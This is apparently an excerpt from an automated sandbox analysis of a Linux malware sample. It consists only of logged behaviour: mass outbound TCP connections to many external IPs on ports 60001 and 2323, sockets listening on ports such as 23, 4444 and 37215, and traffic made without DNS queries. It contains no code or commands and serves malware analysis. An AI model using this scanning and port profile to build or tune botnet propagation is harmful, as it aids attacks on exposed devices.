Source: global traffic TCP traffic: 192.168.2.23:34066 -> 223.243.218.114:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 88.96.210.222:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 133.14.209.204:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 142.111.170.9:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 92.71.103.193:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 162.147.90.119:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.137.10.192:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 223.232.96.241:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 181.202.151.154:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 219.115.124.139:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 68.73.6.204:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 54.208.85.180:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.228.137.193:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 124.200.210.201:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 163.233.18.165:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 162.15.87.155:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 86.76.241.88:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 109.248.179.71:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 51.138.197.64:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 205.115.149.199:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.217.244.186:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.87.96.161:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 94.187.250.178:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 63.136.83.166:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 129.26.18.3:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 169.243.225.137:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 159.12.185.140:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 161.125.187.235:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 205.162.21.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 173.238.102.46:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.98.95.156:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.248.138.157:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 152.143.97.109:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 205.114.17.37:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 184.187.33.99:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 70.141.4.246:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 17.45.62.107:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.117.195.53:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 47.212.152.195:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 147.102.109.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.79.96.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.119.87.6:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 18.133.50.2:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.27.50.27:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 206.44.2.31:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 93.196.141.233:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.74.161.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 58.29.115.97:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.7.34.142:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 203.237.132.77:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.232.204.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 25.182.187.147:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.118.205.35:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 157.187.153.25:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 125.173.44.85:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 196.176.87.55:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 178.174.72.248:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 35.16.219.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 4.2.179.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.187.181.112:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.198.181.24:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.215.220.35:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.38.181.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 153.179.86.207:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 213.86.40.169:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 133.176.234.213:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 187.115.63.64:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.108.74.42:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.17.154.26:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 160.143.92.117:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.134.159.239:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 190.223.45.85:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 165.188.62.44:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 218.89.81.80:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.241.148.137:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 47.45.127.237:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.71.119.163:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 222.198.41.31:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 2.74.251.130:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 182.121.193.108:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 126.205.223.163:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.251.254.132:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 174.26.79.34:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 173.156.81.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 79.203.29.39:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 84.94.29.146:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.101.116.202:60001
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 123.195.104.58:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 17.70.7.83:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 74.28.100.202:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 143.32.92.250:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 52.79.231.71:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 57.112.70.8:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 130.133.22.58:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 169.109.118.134:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 88.208.187.157:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 14.116.233.190:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 4.43.172.83:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 194.65.212.156:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 70.138.187.241:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 113.195.150.196:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 95.121.124.186:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 61.70.250.122:2323
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 86.170.53.107:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 180.248.8.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 203.176.45.183:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 122.53.132.229:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.49.84.150:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 92.124.60.252:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 115.52.224.139:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 60.60.41.162:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 106.172.163.198:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 65.70.167.105:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 111.130.207.205:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.40.96.250:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.163.216.8:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 94.253.181.187:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 182.98.239.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 58.52.166.56:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 59.41.45.224:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 158.248.3.160:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 75.166.85.52:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 90.254.115.12:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.163.10.116:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.39.54.122:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 126.60.156.32:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 57.3.199.170:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 202.27.213.221:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 167.48.227.88:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.108.144.56:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 108.246.72.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 96.107.67.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.194.50.89:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 137.131.254.22:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 170.84.178.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 218.196.123.217:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 95.251.244.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 165.114.253.69:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 112.110.89.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 158.144.97.195:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 20.233.19.143:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 39.96.229.246:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 189.62.185.2:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.18.210.18:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 143.224.144.238:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 120.118.140.160:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 46.115.13.57:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 164.100.7.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 211.118.223.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 194.233.198.53:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.31.148.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.206.72.175:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 78.155.239.80:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 219.48.10.203:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 27.36.153.232:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 219.95.150.109:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.207.211.178:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 200.79.203.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 144.162.252.79:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 134.222.246.62:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 49.175.189.148:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 14.30.8.111:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 111.28.52.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 136.54.43.15:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 103.53.140.247:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.32.93.100:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 24.213.41.172:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 68.180.48.89:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 144.6.62.203:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 106.228.61.53:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 43.94.30.9:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 175.123.136.220:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 132.105.230.84:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.97.162.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.246.56.154:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 94.109.254.153:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 205.72.188.118:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 34.35.107.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 144.240.166.255:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.5.44.26:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.104.251.71:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 157.52.206.247:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 174.128.114.172:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 176.170.117.222:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 74.106.139.170:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 196.218.185.224:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 95.208.37.103:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 96.251.12.179:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 100.220.218.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.165.29.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 73.93.35.181:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.19.170.148:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.158.157.189:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.52.48.115:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.223.160.142:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 106.102.194.215:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 177.67.210.86:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.158.98.166:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 103.243.238.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 100.19.40.185:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.56.103.32:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 18.60.171.58:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 67.248.227.249:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 145.119.255.221:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 45.96.87.65:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.19.3.35:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.28.233.40:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 179.14.62.240:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.249.182.114:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.107.190.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.57.152.78:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 213.138.71.78:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.209.49.71:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 158.130.165.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.211.97.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.135.204.92:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.176.237.106:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 152.85.169.140:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 93.111.23.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 68.130.7.111:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 84.221.11.27:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.193.216.208:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 124.161.2.224:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.14.122.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 111.229.51.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 170.193.179.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 101.67.125.12:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.94.135.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 75.125.83.78:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 35.223.195.176:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 142.56.78.51:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.126.160.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 126.8.163.150:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.12.45.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 161.34.154.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 31.37.0.236:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 147.238.255.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.0.57.93:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.177.192.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 130.47.86.189:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 102.27.2.73:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 79.67.203.76:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 167.249.114.193:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.249.23.159:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 155.201.9.57:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 156.199.156.88:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 45.84.57.112:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 50.31.32.115:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 8.213.164.127:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 171.119.172.241:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 207.65.211.154:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.94.123.208:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 197.168.205.146:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.48.73.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 32.200.201.84:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 5.10.122.234:60001
Sample listens on a socket
Source: /tmp/nSg5RM0w0d (PID: 5278) Socket: 127.0.0.1::43829 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::0 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8000 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::9000 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8080 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8081 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::53413 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::52869 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::37215 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::81 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8089 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8088 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8083 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::443 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::4444 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8001 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::49152 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::40960 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::1024 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::1337 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::420 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::23 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::0 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::80 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::60001 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8000 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::9000 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8080 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8081 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::53413 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::52869 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::37215 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::81 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8089 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8088 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8083 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::443 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::4444 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8001 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::49152 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::40960 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::1024 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::1337 Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::420 Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5321) Socket: <unknown socket type>:unknown Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5498) Socket: <unknown socket type>:unknown Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5527) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5566) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5668) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5746) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5850) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5925) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 6033) Socket: <unknown socket type>:unknown
Source: unknown Network traffic detected: HTTP traffic on port 36688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36690
Source: unknown Network traffic detected: HTTP traffic on port 36694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36692
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36686
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35442
Source: unknown Network traffic detected: HTTP traffic on port 35442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36684 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 116.139.20.113
Source: unknown TCP traffic detected without corresponding DNS query: 53.140.253.164
Source: unknown TCP traffic detected without corresponding DNS query: 160.244.252.219
Source: unknown TCP traffic detected without corresponding DNS query: 106.186.4.115
Source: unknown TCP traffic detected without corresponding DNS query: 143.20.123.85
Source: unknown TCP traffic detected without corresponding DNS query: 14.85.178.30
Source: unknown TCP traffic detected without corresponding DNS query: 104.12.55.80
Source: unknown TCP traffic detected without corresponding DNS query: 74.97.245.104
Source: unknown TCP traffic detected without corresponding DNS query: 43.26.203.44
Source: unknown TCP traffic detected without corresponding DNS query: 47.240.228.221
Source: unknown TCP traffic detected without corresponding DNS query: 124.224.50.17
Source: unknown TCP traffic detected without corresponding DNS query: 5.236.157.4
Source: unknown TCP traffic detected without corresponding DNS query: 1.195.166.194
Source: unknown TCP traffic detected without corresponding DNS query: 116.151.115.9
Source: unknown TCP traffic detected without corresponding DNS query: 19.234.2.69
Source: unknown TCP traffic detected without corresponding DNS query: 105.18.136.120
Source: unknown TCP traffic detected without corresponding DNS query: 69.105.154.223
Source: unknown TCP traffic detected without corresponding DNS query: 204.59.138.218
Source: unknown TCP traffic detected without corresponding DNS query: 27.78.60.127
Source: unknown TCP traffic detected without corresponding DNS query: 167.18.244.178
Source: unknown TCP traffic detected without corresponding DNS query: 63.35.64.164
Source: unknown TCP traffic detected without corresponding DNS query: 107.170.129.229
Source: unknown TCP traffic detected without corresponding DNS query: 17.248.48.48
Source: unknown TCP traffic detected without corresponding DNS query: 125.193.182.178
Source: unknown TCP traffic detected without corresponding DNS query: 85.60.0.108
Source: unknown TCP traffic detected without corresponding DNS query: 47.199.200.41
Source: unknown TCP traffic detected without corresponding DNS query: 8.26.253.162
Source: unknown TCP traffic detected without corresponding DNS query: 201.47.82.243
Source: unknown TCP traffic detected without corresponding DNS query: 163.140.24.2
Source: unknown TCP traffic detected without corresponding DNS query: 75.240.240.117
Source: unknown TCP traffic detected without corresponding DNS query: 40.89.53.178
Source: unknown TCP traffic detected without corresponding DNS query: 72.100.199.25
Source: unknown TCP traffic detected without corresponding DNS query: 145.66.170.212
Source: unknown TCP traffic detected without corresponding DNS query: 43.13.225.229
Source: unknown TCP traffic detected without corresponding DNS query: 138.1.123.135
Source: unknown TCP traffic detected without corresponding DNS query: 89.76.0.231
Source: unknown TCP traffic detected without corresponding DNS query: 72.187.244.43
Source: unknown TCP traffic detected without corresponding DNS query: 184.167.145.52
Source: unknown TCP traffic detected without corresponding DNS query: 222.148.19.116
Source: unknown TCP traffic detected without corresponding DNS query: 196.65.168.167
Source: unknown TCP traffic detected without corresponding DNS query: 4.161.30.32
Source: unknown TCP traffic detected without corresponding DNS query: 68.140.167.253
Source: unknown TCP traffic detected without corresponding DNS query: 160.181.217.108
Source: unknown TCP traffic detected without corresponding DNS query: 57.118.49.254
Source: unknown TCP traffic detected without corresponding DNS query: 80.196.133.136
Source: unknown TCP traffic detected without corresponding DNS query: 129.123.171.139
Source: unknown TCP traffic detected without corresponding DNS query: 115.116.75.75
Source: unknown TCP traffic detected without corresponding DNS query: 79.192.176.15
Source: unknown TCP traffic detected without corresponding DNS query: 124.188.25.45
